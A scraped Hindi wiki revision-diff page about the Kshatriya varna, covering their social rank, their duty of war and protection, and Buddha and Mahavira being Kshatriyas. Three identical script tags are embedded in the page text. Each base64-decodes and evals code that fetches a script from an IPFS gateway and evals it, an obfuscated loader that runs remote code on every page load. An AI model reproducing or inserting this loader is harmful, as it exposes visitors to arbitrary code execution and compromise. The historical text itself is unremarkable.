Difference between revisions of "क्षत्रिय"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 4: Line 4:
 
*[[ब्राह्मण साहित्य|ब्राह्मण ग्रंथों]] के अनुसार क्षत्रियों की गणना [[ब्राह्मण|ब्राहमणों]] के बाद की जाती थी, परंतु [[बौद्ध साहित्य|बौद्ध ग्रंथों]] के अनुसार चार वर्णों में क्षत्रियों को ब्राह्मणों से ऊँचा अर्थात समाज में सर्वोपरि स्थान प्राप्त था।  
 
*[[ब्राह्मण साहित्य|ब्राह्मण ग्रंथों]] के अनुसार क्षत्रियों की गणना [[ब्राह्मण|ब्राहमणों]] के बाद की जाती थी, परंतु [[बौद्ध साहित्य|बौद्ध ग्रंथों]] के अनुसार चार वर्णों में क्षत्रियों को ब्राह्मणों से ऊँचा अर्थात समाज में सर्वोपरि स्थान प्राप्त था।  
 
*[[गौतम बुद्ध]] और [[महावीर]] दोनों क्षत्रिय थे और इससे इस स्थापना को बल मिलता है कि [[बौद्ध धर्म]] और [[जैन धर्म]] जहाँ एक ओर समाज में ब्राह्मणों की श्रेष्ठता के दावे के प्रति क्षत्रियों के विरोध भाव को प्रकट करते हैं, वहीं दूसरी ओर पृथक जीवन दर्शन के लिए उनकी आकांक्षा को भी अभिव्यक्ति देते हैं। जो भी है बाद में क्षत्रियों का स्थान निश्चित रूप से चारों वर्णों में ब्राह्मणों के बाद दूसरा माना जाता था।  
 
*[[गौतम बुद्ध]] और [[महावीर]] दोनों क्षत्रिय थे और इससे इस स्थापना को बल मिलता है कि [[बौद्ध धर्म]] और [[जैन धर्म]] जहाँ एक ओर समाज में ब्राह्मणों की श्रेष्ठता के दावे के प्रति क्षत्रियों के विरोध भाव को प्रकट करते हैं, वहीं दूसरी ओर पृथक जीवन दर्शन के लिए उनकी आकांक्षा को भी अभिव्यक्ति देते हैं। जो भी है बाद में क्षत्रियों का स्थान निश्चित रूप से चारों वर्णों में ब्राह्मणों के बाद दूसरा माना जाता था।  
 
+
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक=|पूर्णता=|शोध=}}
 
 
 
 
 
 
 
 
{{लेख प्रगति|आधार=आधार1|प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}
 
{{संदर्भ ग्रंथ}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Revision as of 06:11, 9 August 2012

  • bharatiy aryoan mean atyant arambhik kal se varn vyavastha milati hai, jisake anusar samaj mean unako doosara sthan prapt tha.
  • unaka kary yuddh karana tatha praja ki raksha karana tha.
  • 'kshatriy' shabd ki vyutpatti ki drishti se arth hai jo doosaroan ko kshat se bachaye.
  • brahman granthoan ke anusar kshatriyoan ki ganana brahamanoan ke bad ki jati thi, parantu bauddh granthoan ke anusar char varnoan mean kshatriyoan ko brahmanoan se ooancha arthat samaj mean sarvopari sthan prapt tha.
  • gautam buddh aur mahavir donoan kshatriy the aur isase is sthapana ko bal milata hai ki bauddh dharm aur jain dharm jahaan ek or samaj mean brahmanoan ki shreshthata ke dave ke prati kshatriyoan ke virodh bhav ko prakat karate haian, vahian doosari or prithak jivan darshan ke lie unaki akaanksha ko bhi abhivyakti dete haian. jo bhi hai bad mean kshatriyoan ka sthan nishchit roop se charoan varnoan mean brahmanoan ke bad doosara mana jata tha.
panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh


bhattachary, sachchidanand bharatiy itihas kosh (hiandi). lakhanoo: uttarapradesh hiandi sansthan, 110.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>